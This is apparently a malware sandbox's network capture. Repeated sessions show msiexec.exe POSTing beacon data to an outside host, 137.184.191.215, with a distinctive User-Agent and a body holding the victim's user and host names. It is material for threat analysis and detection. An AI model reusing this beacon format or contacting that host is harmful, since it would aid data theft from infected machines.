                                      9 | 192.168.2.5 | 49726 | 137.184.191.215 | 80 | 2584 | C:\Windows\SysWOW64\msiexec.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Oct 1, 2024 07:44:00.644911051 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:00.649719954 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:03.214181900 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:01 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:03.214245081 CEST | 1236 | IN
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:44:03.214284897 CEST | 366 | IN
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      10 | 192.168.2.5 | 49727 | 137.184.191.215 | 80 | 2584 | C:\Windows\SysWOW64\msiexec.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Oct 1, 2024 07:44:03.363595009 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:03.369738102 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:06.087287903 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:03 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:06.087312937 CEST | 224 | IN
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                      Oct 1, 2024 07:44:06.087327003 CEST | 1236 | IN
                                      Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                      Oct 1, 2024 07:44:06.087342024 CEST | 142 | IN
                                      Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      11 | 192.168.2.5 | 49728 | 137.184.191.215 | 80 | 2584 | C:\Windows\SysWOW64\msiexec.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Oct 1, 2024 07:44:06.234761000 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:06.239645004 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:08.879153013 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:06 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:08.879168034 CEST | 1236 | IN
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:44:08.879179955 CEST | 366 | IN
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      12 | 192.168.2.5 | 49729 | 137.184.191.215 | 80 | 2584 | C:\Windows\SysWOW64\msiexec.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Oct 1, 2024 07:44:09.036484003 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:09.041358948 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:11.705089092 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:09 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:11.705111980 CEST | 1236 | IN
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:44:11.705123901 CEST | 366 | IN
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      13 | 192.168.2.5 | 49731 | 137.184.191.215 | 80 | 2584 | C:\Windows\SysWOW64\msiexec.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Oct 1, 2024 07:44:11.884329081 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:11.889230967 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:15.545639992 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:12 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:15.545659065 CEST | 224 | IN
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                      Oct 1, 2024 07:44:15.545672894 CEST | 1236 | IN
                                      Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                      Oct 1, 2024 07:44:15.545685053 CEST | 142 | IN
                                      Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      14 | 192.168.2.5 | 49732 | 137.184.191.215 | 80 | 2584 | C:\Windows\SysWOW64\msiexec.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Oct 1, 2024 07:44:15.688711882 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:15.693619967 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:18.316979885 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:16 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:18.317003965 CEST | 1236 | IN
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:44:18.317017078 CEST | 366 | IN
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      15 | 192.168.2.5 | 49733 | 137.184.191.215 | 80 | 2584 | C:\Windows\SysWOW64\msiexec.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Oct 1, 2024 07:44:18.470282078 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:18.475107908 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:21.054193020 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:18 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:21.054260015 CEST | 1236 | IN
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:44:21.054301023 CEST | 366 | IN
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      16 | 192.168.2.5 | 49734 | 137.184.191.215 | 80 | 2584 | C:\Windows\SysWOW64\msiexec.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Oct 1, 2024 07:44:21.205100060 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:21.209923983 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:23.780258894 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:21 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:23.780282021 CEST | 1236 | IN
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:44:23.780298948 CEST | 366 | IN
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      17 | 192.168.2.5 | 49735 | 137.184.191.215 | 80 | 2584 | C:\Windows\SysWOW64\msiexec.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Oct 1, 2024 07:44:23.926706076 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:23.931600094 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:26.561662912 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:24 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:26.561687946 CEST | 1236 | IN
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:44:26.561701059 CEST | 366 | IN
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      18 | 192.168.2.5 | 49736 | 137.184.191.215 | 80 | 2584 | C:\Windows\SysWOW64\msiexec.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Oct 1, 2024 07:44:26.704231977 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:26.709115982 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:29.245637894 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:27 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:29.245692015 CEST | 224 | IN
